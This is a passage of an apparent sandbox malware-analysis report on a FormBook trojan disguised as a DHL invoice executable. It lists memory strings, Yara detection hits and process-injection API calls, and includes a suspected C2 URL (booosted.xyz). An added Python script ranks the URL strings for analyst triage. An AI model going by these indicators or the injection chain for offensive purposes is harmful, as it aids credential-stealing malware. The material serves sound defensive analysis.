            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: wextract.exe, 0000000D.00000003.2250390575.000000000794E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: wextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://nojs.domaincntrol.com
            Source: wextract.exe, 0000000D.00000002.4141477691.000000000619A000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000445A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://wa.me/94760523025?text=Hi
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: wextract.exe, 0000000D.00000002.4141477691.000000000619A000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000445A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-NF7P1YH6NR
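The memory-string rows above mix one string that matters (http://www.booosted.xyz/ndw1/ in an rQkTBkrqhGpTBn.exe region whose dump name carries protection 0x40) with many that merely sit in process memory (browser search-provider defaults and login.live.com endpoints in wextract.exe). The script below is an added example, not code from the Joe Sandbox report, that parses these rows and ranks them for an analyst. It assumes the dump names have the layout seen above, <process index>.<run>.<dump id>.<base address>.<protection>.<three further fields>.sdmp, and reads the protection field as the Windows PAGE_* constant of the region (0x40 = PAGE_EXECUTE_READWRITE); that reading, and the "short single-segment path over plain HTTP" heuristic for a FormBook-style C2 URL, are this example's own assumptions rather than anything the report states. The sample rows are adapted from the rows above and include both separator forms the page shows.

```python
"""Triage 'String found in binary or memory' rows of a Joe Sandbox report.
Added example, not code from the report. Assumes the dump-name layout
<proc>.<run>.<id>.<base>.<protect>.<x>.<y>.<z>.sdmp with <protect> being the
Windows PAGE_* constant; the URL-shape heuristic is also this example's own."""
import re
from urllib.parse import urlsplit

PAGE_PROTECT = {            # Windows memory-protection constants
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}
ROW = re.compile(r"Source:\s*(?P<sources>.*?)\s*\|?\s*"
                 r"String found in binary or memory:\s*(?P<url>\S+)")
DUMP = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
                  r"([0-9A-F]{8})\.[0-9A-F]{8}\.[0-9A-F]{8}\.[0-9A-F]{8}\.sdmp$")
SHORT_PATH = re.compile(r"^/[a-z0-9]{2,8}/$")   # e.g. /ndw1/ in the row above
SCORE = {"cleartext http": 1, "formbook-style C2 path": 2, "url in RWX region": 2}

def parse_dump_name(name):
    """Fields of a '<proc>.<run>.<id>.<base>.<protect>...sdmp' name, or None."""
    m = DUMP.match(name)
    if not m:
        return None
    protect = int(m.group(5), 16)
    return {"process_index": int(m.group(1), 16), "run": int(m.group(2), 16),
            "base": int(m.group(4), 16), "protect_value": protect,
            "protect": PAGE_PROTECT.get(protect, "0x%x" % protect)}

def parse_row(row):
    """One row -> ([(source name, dump fields or None), ...], url), or None."""
    m = ROW.search(row)
    if not m:
        return None
    sources = []
    for tok in (t.strip() for t in m.group("sources").split(",")):
        dump = parse_dump_name(tok)
        if dump is not None and sources:
            sources[-1] = (sources[-1][0], dump)   # dump follows its process
        elif tok:
            sources.append((tok, None))            # process image or dropped file
    return sources, m.group("url")

def classify_url(url):
    """Flags derived from the URL alone (heuristics of this example)."""
    u = urlsplit(url)
    flags = []
    if u.scheme == "http":
        flags.append("cleartext http")
        if SHORT_PATH.match(u.path):
            flags.append("formbook-style C2 path")
    return flags

def triage(rows):
    """Score every (source, url) pair; highest score first."""
    findings = []
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        sources, url = parsed
        for source, dump in sources:
            flags = classify_url(url)
            if dump and dump["protect_value"] == 0x40:
                flags.append("url in RWX region")
            findings.append({
                "url": url, "source": source, "flags": flags,
                "process_index": dump["process_index"] if dump else None,
                "base": dump["base"] if dump else None,
                "protect": dump["protect"] if dump else None,
                "score": sum(SCORE[f] for f in flags)})
    return sorted(findings, key=lambda f: -f["score"])

# Sample rows adapted from the report above; both separator forms occur.
SAMPLE_ROWS = [
    "Source: rQkTBkrqhGpTBn.exe, 0000000E.00000002.4142164546.00000000053F1000"
    ".00000040.80000000.00040000.00000000.sdmpString found in binary or memory: "
    "http://www.booosted.xyz/ndw1/",
    "Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004"
    ".00000020.00020000.00000000.sdmpString found in binary or memory: "
    "https://duckduckgo.com/ac/?q=",
    "Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net",
    "Source: wextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004"
    ".10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002"
    ".4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmp | "
    "String found in binary or memory: https://nojs.domaincntrol.com",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f["score"], f["source"], f["protect"], f["url"], f["flags"])
```

Run over the rows above, the booosted.xyz string comes out on top because it combines all three flags, while the search-provider and login.live.com strings score zero: they are HTTPS, carry normal paths, and live in read-write regions of wextract.exe. A process index of 14 corresponds to the "0000000E" prefix of the dump name, the same numbering the report uses in names such as 4.2.csc.exe.400000.0.unpack.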

            E-Banking Fraud

            Source: Yara match | File source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0042C663 NtClose | 4_2_0042C663
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0040AD68 NtDelayExecution | 4_2_0040AD68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782DF0 NtQuerySystemInformation, LdrInitializeThunk | 4_2_05782DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782C70 NtFreeVirtualMemory, LdrInitializeThunk | 4_2_05782C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782B60 NtClose, LdrInitializeThunk | 4_2_05782B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057835C0 NtCreateMutant, LdrInitializeThunk | 4_2_057835C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05784650 NtSuspendThread | 4_2_05784650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05784340 NtSetContextThread | 4_2_05784340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782D30 NtUnmapViewOfSection | 4_2_05782D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782D10 NtMapViewOfSection | 4_2_05782D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782D00 NtSetInformationFile | 4_2_05782D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782DD0 NtDelayExecution | 4_2_05782DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782DB0 NtEnumerateKey | 4_2_05782DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782C60 NtCreateKey | 4_2_05782C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782C00 NtQueryInformationProcess | 4_2_05782C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782CF0 NtOpenProcess | 4_2_05782CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782CC0 NtQueryVirtualMemory | 4_2_05782CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782CA0 NtQueryInformationToken | 4_2_05782CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782F60 NtCreateProcessEx | 4_2_05782F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782F30 NtCreateSection | 4_2_05782F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782FE0 NtCreateFile | 4_2_05782FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782FB0 NtResumeThread | 4_2_05782FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782FA0 NtQuerySection | 4_2_05782FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782F90 NtProtectVirtualMemory | 4_2_05782F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782E30 NtWriteVirtualMemory | 4_2_05782E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782EE0 NtQueueApcThread | 4_2_05782EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782EA0 NtAdjustPrivilegesToken | 4_2_05782EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782E80 NtReadVirtualMemory | 4_2_05782E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782BF0 NtAllocateVirtualMemory | 4_2_05782BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782BE0 NtQueryValueKey | 4_2_05782BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782BA0 NtEnumerateValueKey | 4_2_05782BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782B80 NtQueryInformationFile | 4_2_05782B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782AF0 NtWriteFile | 4_2_05782AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782AD0 NtReadFile | 4_2_05782AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05782AB0 NtWaitForSingleObject | 4_2_05782AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05783010 NtOpenDirectoryObject | 4_2_05783010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05783090 NtSetValueKey | 4_2_05783090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05783D70 NtOpenThread | 4_2_05783D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05783D10 NtOpenProcessToken | 4_2_05783D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057839B0 NtGetContextThread | 4_2_057839B0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_046035C0 NtCreateMutant, LdrInitializeThunk | 13_2_046035C0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04604650 NtSuspendThread, LdrInitializeThunk | 13_2_04604650
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04604340 NtSetContextThread, LdrInitializeThunk | 13_2_04604340
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602C60 NtCreateKey, LdrInitializeThunk | 13_2_04602C60
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602C70 NtFreeVirtualMemory, LdrInitializeThunk | 13_2_04602C70
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602CA0 NtQueryInformationToken, LdrInitializeThunk | 13_2_04602CA0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602D30 NtUnmapViewOfSection, LdrInitializeThunk | 13_2_04602D30
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602D10 NtMapViewOfSection, LdrInitializeThunk | 13_2_04602D10
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602DF0 NtQuerySystemInformation, LdrInitializeThunk | 13_2_04602DF0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602DD0 NtDelayExecution, LdrInitializeThunk | 13_2_04602DD0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602EE0 NtQueueApcThread, LdrInitializeThunk | 13_2_04602EE0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602E80 NtReadVirtualMemory, LdrInitializeThunk | 13_2_04602E80
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602F30 NtCreateSection, LdrInitializeThunk | 13_2_04602F30
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602FE0 NtCreateFile, LdrInitializeThunk | 13_2_04602FE0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602FB0 NtResumeThread, LdrInitializeThunk | 13_2_04602FB0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_046039B0 NtGetContextThread, LdrInitializeThunk | 13_2_046039B0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602AF0 NtWriteFile, LdrInitializeThunk | 13_2_04602AF0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602AD0 NtReadFile, LdrInitializeThunk | 13_2_04602AD0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602B60 NtClose, LdrInitializeThunk | 13_2_04602B60
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602BE0 NtQueryValueKey, LdrInitializeThunk | 13_2_04602BE0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602BF0 NtAllocateVirtualMemory, LdrInitializeThunk | 13_2_04602BF0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602BA0 NtEnumerateValueKey, LdrInitializeThunk | 13_2_04602BA0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04603010 NtOpenDirectoryObject | 13_2_04603010
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04603090 NtSetValueKey | 13_2_04603090
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602C00 NtQueryInformationProcess | 13_2_04602C00
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602CF0 NtOpenProcess | 13_2_04602CF0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602CC0 NtQueryVirtualMemory | 13_2_04602CC0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04603D70 NtOpenThread | 13_2_04603D70
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602D00 NtSetInformationFile | 13_2_04602D00
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04603D10 NtOpenProcessToken | 13_2_04603D10
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602DB0 NtEnumerateKey | 13_2_04602DB0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602E30 NtWriteVirtualMemory | 13_2_04602E30
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602EA0 NtAdjustPrivilegesToken | 13_2_04602EA0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602F60 NtCreateProcessEx | 13_2_04602F60
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602FA0 NtQuerySection | 13_2_04602FA0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602F90 NtProtectVirtualMemory | 13_2_04602F90
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602AB0 NtWaitForSingleObject | 13_2_04602AB0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_04602B80 NtQueryInformationFile | 13_2_04602B80
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_00429030 NtDeleteFile | 13_2_00429030
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_004290D0 NtClose | 13_2_004290D0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_00429240 NtAllocateVirtualMemory | 13_2_00429240
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_00428DD0 NtCreateFile | 13_2_00428DD0
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_00428F40 NtReadFile | 13_2_00428F40
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_048EF8D0 NtMapViewOfSection | 13_2_048EF8D0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045EFB8013_2_045EFB80
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0041196013_2_00411960
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0041503013_2_00415030
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0041321013_2_00413210
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0042B70013_2_0042B700
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040C8C013_2_0040C8C0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040C8B713_2_0040C8B7
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040CAE013_2_0040CAE0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040AB6013_2_0040AB60
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048EE4A413_2_048EE4A4
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048EE79D13_2_048EE79D
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048EE38413_2_048EE384
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048ED8A813_2_048ED8A8
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048ED87313_2_048ED873
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048ECB5813_2_048ECB58
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 04605130 appears 36 times
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 0464F290 appears 103 times
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 04617E54 appears 93 times
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 045BB970 appears 250 times
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 0463EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 057BEA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05797E54 appears 96 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0573B970 appears 254 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05785130 appears 37 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 057CF290 appears 103 times
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6540 -s 1348
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: No import functions for PE file found
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B400001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHurensohn.exe4 vs dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000000.1677272907.000002B47A1C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHurensohn.exe4 vs dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeBinary or memory string: OriginalFilenameHurensohn.exe4 vs dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
            Source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
